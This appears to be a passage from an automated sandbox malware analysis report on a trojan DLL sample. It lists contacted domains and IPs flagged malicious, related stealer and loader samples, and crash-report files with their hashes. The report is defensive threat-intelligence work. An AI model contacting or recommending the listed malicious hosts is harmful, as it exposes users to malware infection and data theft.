                                                                                                                                                                                http://x1.c.lencr.org/0rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731677122.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848849900.0000029F3BE0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1574607542.0000029F3B856000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2578798813.0000029F3B7E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644516828.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644479966.0000029F3B858000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2366245082.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 
00000017.00000003.2029246377.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2218239826.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731411754.0000029F3BE0D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                http://x1.i.lencr.org/0rundll32.exe, 00000017.00000003.2218316136.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731677122.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848849900.0000029F3BE0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1574607542.0000029F3B856000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2578798813.0000029F3B7E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1561284586.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644516828.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1644479966.0000029F3B858000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2178587162.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2366245082.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029246377.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 
00000017.00000003.2218239826.0000029F3B853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1731411754.0000029F3BE0D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B81A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                unknown
IP             Domain            Country             ASN     ASN Name               Malicious
188.114.96.3   isomicrotich.com  European Union      13335   CLOUDFLARENETUS        true
82.115.223.39  greshunka.com     Russian Federation  209821  MIDNET-ASTK-TelecomRU  true
80.78.24.30    tiguanin.com      Cyprus              37560   CYBERDYNELR            true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1525190
Start date and time: 2024-10-03 20:44:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 34s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: vierm_soft_x64.dll.dll
(renamed file extension from exe to dll)
Original Sample Name: vierm_soft_x64.dll.exe
Detection: MAL
Classification: mal100.troj.evad.winDLL@28/25@5/3
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 48
• Number of non-executed functions: 204
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.182.143.212
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target rundll32.exe, PID 3648 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: vierm_soft_x64.dll.dll
Time      Type             Description
14:45:00  API Interceptor  6x Sleep call for process: WerFault.exe modified
14:45:03  API Interceptor  1x Sleep call for process: loaddll64.exe modified
14:45:04  API Interceptor  2204325x Sleep call for process: rundll32.exe modified
14:45:55  API Interceptor  2198427x Sleep call for process: explorer.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      tMREqVW0.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                      • 104.20.3.235
                                                                                                                                                                                                                      https://auth-owlting.com/enterprise/core.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.67.204.46
                                                                                                                                                                                                                      https://wvr4dgzxxavl6jjpq7rl.igortsaplin.pro/WFzFCiNxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                      • 104.18.95.41
                                                                                                                                                                                                                      https://www.calameo.com/read/0077804248b46bb5a7c19Get hashmaliciousHtmlDropperBrowse
                                                                                                                                                                                                                      • 172.67.204.105
                                                                                                                                                                                                                      http://usaf.gov.ssGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.26.6.103
                                                                                                                                                                                                                      wSVyC8FY.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                      • 172.67.19.24
                                                                                                                                                                                                                      https://secured.viewonlineportalshared.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                                                      • 104.18.95.41
                                                                                                                                                                                                                      RfeGlbGe3t.exeGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                                                                                                                                      • 1.2.3.4
                                                                                                                                                                                                                      https://dsfghfdaregfdgshfgdfh.blob.core.windows.net/dsfghfdaregfdgshfgdfh/l1.html#9/372-16527/1270-243896-29108Get hashmaliciousPhisherBrowse
                                                                                                                                                                                                                      • 104.21.32.108
                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1Document-18-33-08.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      c84f2f8df965727bcdcc4de6beecf70c960ef7c885e77.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      0a839761915d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      sqlite.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      Activator by URKE v2.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      hVLguQ1OyJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                      Entropy (8bit):0.7610145849760318
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:MVGIiayGVn0+BbCjjVBuzuiFNZ24lO8W:NIiHGV0+Bbsj6zuiFNY4lO8W
                                                                                                                                                                                                                      MD5:9E2254A0413830FD41C7CC35B1CA6B87
                                                                                                                                                                                                                      SHA1:A207FCDECC49809DE361145CE2775B7BD52DB971
                                                                                                                                                                                                                      SHA-256:343BE3CD7541C6272E4DE9CF9EF5DE30FDB8CAC74FC23FAC8065AB763975E2B9
                                                                                                                                                                                                                      SHA-512:696C70575B6EA24BC56ABCFB6C7597801070612C6ABB597ACEE5FBDB8FDBDF9AAE8B545254565091D4C660852A651EC29B1058ACC15F2FE0C9B872A9D2E458B8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                      Entropy (8bit):0.7707941624353578
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:FCFa3o/VlwihyKynsjz4Rvoq7Rc6tQXIDcQ9c61cEccw3D9XaXz+HbHgSQgJj9Z2:ssYAihync0Dx23NjVBuzuiFNZ24lO8B
                                                                                                                                                                                                                      MD5:737E598D48A2E5DC5CEF3324B83DB17F
                                                                                                                                                                                                                      SHA1:436915A0E54B3DA5E477B6944E6015C193EEC1C0
                                                                                                                                                                                                                      SHA-256:62B8E8443938D8A5A3F591224F7A230A384E16DC15EE2548CD4C4050EF52CA83
                                                                                                                                                                                                                      SHA-512:8AC6B9598C0448751C042DF0702069B1CE08E38DC09D7DF0136980F96920375435C2799B0F5204A213754FA69E814E2ED6F765292D00E2FDD2DC5F284F1DB4A1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                      Entropy (8bit):0.7677763314127422
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:yCFnnwi4yKygsjz4Rvoq7Rc6tQXIDcQ9c61cEccw3D9XaXz+HbHgSQgJj9Zh88Wv:Rui4ygc0Dx23NjVBuzuiFNZ24lO8B
                                                                                                                                                                                                                      MD5:35BE126270E3F69DE03ECCE5A3EAF185
                                                                                                                                                                                                                      SHA1:474E899498292B6F65ACFECCD9FE352278D9A8E6
                                                                                                                                                                                                                      SHA-256:BC7DE070C0DE0C955D278041AA2ACA454155E282E4ADAE77C2472C3750640563
                                                                                                                                                                                                                      SHA-512:EABE9CE5E4DCCFA3D9AF3F11BCC42C608B8399D157F46D281FD6DFEF4E892CA7AF04D154406A024441575B1149EEFD47DCBFBF7FE3609A7F05055091AB5B3AFD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                      Entropy (8bit):0.7676803576014632
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:I/FmwiRyKy8asjz4Rvoq7Rc6tQXIDcQ9c61cEccw3D9XaXz+HbHgSQgJj9Zh88Wv:WPiRyzc0Dx23NjVBuzuiFNZ24lO8B
                                                                                                                                                                                                                      MD5:4106B9E3AB6EB2205D2BD84BBF22AC64
                                                                                                                                                                                                                      SHA1:745CFD5A21B8E2A6A91604ADA42CCD5A91250164
                                                                                                                                                                                                                      SHA-256:05D0BFCE25FBACA906D082331DB10DFF6CB081A5142BBE0B5ACEF9B166507F0E
                                                                                                                                                                                                                      SHA-512:546D58D53607DD289C54D1F8011AFE16B577C2F416A5620555AD0544A6232DA6989C8C0D911516D7C26F38514A987F529097157574310851DB7BC527776ED58D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                      Entropy (8bit):0.7610494720878345
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:zFo8FmKwisyKyVsjz4RvI7qPfgQXIDcQAc6FcEfcw3iXaXz+HbHgSQgJj9Zh88We:za84isyVVv0+BV0jVBuzuiFNZ24lO8W
                                                                                                                                                                                                                      MD5:9002146B1AA3BA92086308D09BEE8F2C
                                                                                                                                                                                                                      SHA1:C7993B48D4859F13AC470B1B7D66956222DA493A
                                                                                                                                                                                                                      SHA-256:52D0B5B8FEA9538F17B7A70358918EEC6F50E2AFEA153A59CBE81C53BD56CF1A
                                                                                                                                                                                                                      SHA-512:2F6F5172DFA5188D648D949FB8FD2C8A5D522E632F2E5D71F9FEEFC262DAD0DC0E1A6E03F45873BB6AA174BA01474862CF8929F6547AA60C4A2E0D1BB150BBFE
                                                                                                                                                                                                                      Malicious:false
Preview:Version=1..EventType=APPCRASH..EventTime=133724547043955749..ReportType=2..Consent=1..UploadTime=133724547050205791..ReportStatus=524384..ReportIdentifier=71f73fd6-6b3e-4607-9047-6ca8f3853fae..IntegratorReportIdentifier=904b8aca-5257-443a-a8a4-cd55d7e624e0..Wow64Host=34404..NsAppName=rundll32.exe_vierm_soft_x64.dll.dll..OriginalFilename=RUNDLL32.EXE..AppSessionGuid=00001dc4-0001-0014-ac63-a05bc415db01..TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000dd399ae46303343f9f0da189aee11c
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                      Entropy (8bit):0.7611787015063111
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:lMFRQibwityKyDsjz4RvI7qPfgQXIDcQAc6FcEfcw3iXaXz+HbHgSQgJj9Zh88We:CMDityDVv0+BV0jVBuzuiFNZ24lO8W
                                                                                                                                                                                                                      MD5:1086BCDCBEF460EA2A4D8A959F1096C4
                                                                                                                                                                                                                      SHA1:56D5EB4D35F8305BB45AE7A9860DD44759C49C29
                                                                                                                                                                                                                      SHA-256:E28DE1C390647B30A2507BB8872C50072768B55E55CBF1CCEE0CF1B035DDB0A6
                                                                                                                                                                                                                      SHA-512:77AD2FE5603052850D7802D9A6F0A295DD68ED47105413AF52BA5A516CCE1ED1733A2488C091E819F66380E223E688F693272109957737EA260C130D3C5D23A7
                                                                                                                                                                                                                      Malicious:false
Preview:Version=1..EventType=APPCRASH..EventTime=133724547004770581..ReportType=2..Consent=1..UploadTime=133724547009458192..ReportStatus=524384..ReportIdentifier=b6104caa-1983-4b71-878f-bd35263514ce..IntegratorReportIdentifier=1b0d6409-57e5-4eeb-9fa5-f4d150df363e..Wow64Host=34404..NsAppName=rundll32.exe_vierm_soft_x64.dll.dll..OriginalFilename=RUNDLL32.EXE..AppSessionGuid=00001d2c-0001-0014-69cc-d159c415db01..TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000dd399ae46303343f9f0da189aee11c
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Thu Oct 3 18:44:54 2024, 0x1205a4 type
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):48424
                                                                                                                                                                                                                      Entropy (8bit):1.410090684808478
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:5b8fOpoA2aC4FJXNMJpizjgpsIoi7MXZdV43FXwSnFTZ8WLApnOS4lCS9WIXnIBR:O08oOMXZwXwSnFTZ8W8nOSTSuai/f
                                                                                                                                                                                                                      MD5:B8C8DCAA2AB7157AAAB9AB22C74124AF
                                                                                                                                                                                                                      SHA1:BB16DD72BAD8A8375257EE28BA6FC33A224AE5BB
                                                                                                                                                                                                                      SHA-256:4A151D46C5179D65C701AF5C6CC993292F65014D53F12F083EB38777ECF3CE30
                                                                                                                                                                                                                      SHA-512:9CECEA12ABC8BA0A340A2ACA1057C0FC49FE019BEDF5DA730049F650C417FEA9A01C2389165C83D7C2489B3582A1BDBFBB40143C658AA076C80D434A7DD64E8C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Thu Oct 3 18:44:54 2024, 0x1205a4 type
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):48748
                                                                                                                                                                                                                      Entropy (8bit):1.4019290022352078
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:5b8kxoA2aC4FJXNMJpisxjcOGoi7MTNrzk6aSwjIlmSnDpuS5WIQL86IBbxQc7vo:Og8rOMTNrCSw/SDpuSvB7xOpX
                                                                                                                                                                                                                      MD5:D4E6B720329DF0A282D6CAE9000F8624
                                                                                                                                                                                                                      SHA1:3BFFEF2D86CB2F3C95F2120D084048465BD4FD77
                                                                                                                                                                                                                      SHA-256:06E06CCE109DE71F81594863382D456DC02D0C74A3BE465D88813F6173F10857
                                                                                                                                                                                                                      SHA-512:C4A53A239F5F9B6D46884B3C3C94122FD26CF3AEA4C321DA67993E7D906E8ADDBA4B2ACDB929651704BBE48B8A7810EBC27660950495B446F77042EB24BFBD3B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8664
                                                                                                                                                                                                                      Entropy (8bit):3.6994987851471235
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJ/kPUC46YKeF5gmfI3ZApDa89bsgZf1Em:R6lXJsPUr6YTLgmfI3gsmfT
                                                                                                                                                                                                                      MD5:77DC60C071FDC2E902198E8F29036A4A
                                                                                                                                                                                                                      SHA1:18BB6F52EE4889A3B3995C4B3BDB6101A591D4B7
                                                                                                                                                                                                                      SHA-256:344577E4D04E928DA2D29DDE13B7DAADC9C2F30ECAC740F9161D95FCBB05485C
                                                                                                                                                                                                                      SHA-512:592437F03B3142F0A5006D45471F8484E3A0091CC30589E37926E6DA1ACDE6996AC681DC0B6F3CEC1266F0D972FE9AF75CE25527C5BC5747764311E93C15A7AE
                                                                                                                                                                                                                      Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>7148</Pi
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4940
                                                                                                                                                                                                                      Entropy (8bit):4.510541971862157
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zse2OiJg771I9eBWpW8VYMU0Ym8M4JCECyTOXFspByq8vhyTOJ0ptSTSZ:uIjfwwI7FQ7V/eJL3WGk0poOLd
                                                                                                                                                                                                                      MD5:E0D7E9261089575825C1D9D643729273
                                                                                                                                                                                                                      SHA1:95EDB180B1B89F32268057AB49534EF2EB6426C1
                                                                                                                                                                                                                      SHA-256:2CC210957D3AE59D0355EEB9F432785478CFB9278B28397E1D0F77B3A1207B52
                                                                                                                                                                                                                      SHA-512:AF267AEAF3A9E48E6DC3AA5CBEEF1B7A56FCFE13B5C4F9957F1D0B1625D0C797D6FB12BB0146C8849EC7548719257D6AEF104856AC3DE960D8689EDC05E86B04
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527627" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8652
                                                                                                                                                                                                                      Entropy (8bit):3.7006434898887206
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJk/lUM6YEFHwygmfI3ZApDP89bsgZf3Em:R6lXJslUM6YEFlgmfI3TsmfB
                                                                                                                                                                                                                      MD5:7A125DB64830109BB6C05587F7434C0A
                                                                                                                                                                                                                      SHA1:218B6077AFBAD88DC7ACC33595630477272FC444
                                                                                                                                                                                                                      SHA-256:B517AC6E3A848C1FDE21FFE9413FB8CAEF8E46BE8B472E46ABC89AFE722408FD
                                                                                                                                                                                                                      SHA-512:6797EC7CF101CC92869FCED927163A3276B39A750CDA7468373268A6417C11B3D8D2113C2A91C856BBE3F034BCDFA9488F0A3F8809C7B17D4C310B3A86D5E565
                                                                                                                                                                                                                      Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>3648</Pi
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4940
                                                                                                                                                                                                                      Entropy (8bit):4.506811322477142
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zse2OiJg771I9eBWpW8VYHYm8M4JCECyTOXFCOPyq8vhyTOt/ptSTSOd:uIjfwwI7FQ7V7JL3OPWG4/poOOd
                                                                                                                                                                                                                      MD5:0D23C17D0079AE5E7A0BAB2C67F072C8
                                                                                                                                                                                                                      SHA1:A27FB4722DF7136DF57861A7C3E21D38D96A99A6
                                                                                                                                                                                                                      SHA-256:D50805C3F1D03D1377CAE4B71CB12942C2707E017E23EBD9A789A118CA911557
                                                                                                                                                                                                                      SHA-512:C04163AB5DD5440552CB7F9E4343B63A1B9ED4A03F2B9F43C37ED5D5A3DD476F278BB062039C2BC29C1399B8014586869F5183E721260DF95188905E7FA8750E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527627" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Thu Oct 3 18:44:57 2024, 0x1205a4 type
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):57260
                                                                                                                                                                                                                      Entropy (8bit):1.6622455505482143
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:5f9810OMBizj/dWS4S3AfWvJwxVL5ODWQzzMpBDcdwSwC0QO:heFuajdVQftVL5OMq9wCW
                                                                                                                                                                                                                      MD5:990796569D66E1CCCC6567A73E4F6286
                                                                                                                                                                                                                      SHA1:3CEE9E1D389DB6E2F721B60EA81E813764CEBC49
                                                                                                                                                                                                                      SHA-256:3B429B1535FE6FE47CD53F433AEED20512B8421E3FFB6D03619ABCCB73F3F7F3
                                                                                                                                                                                                                      SHA-512:B2382073D0D8F0DF971F73BB3AF70CFD066388EE28FDC9B115AB13B348FF7553418B4DF059D571C7254E9B4D543DCA4BB1300EA9DF6C2E12B41EECE9ECA7A131
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8794
                                                                                                                                                                                                                      Entropy (8bit):3.7057873521258604
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJQQrUP6YEFXwygmf1VMOprw89bn+jfSGdvtm:R6lXJnrUP6YEllgmf1VFnCf1O
                                                                                                                                                                                                                      MD5:AC3916582DEBC9EFACDD388D394056E1
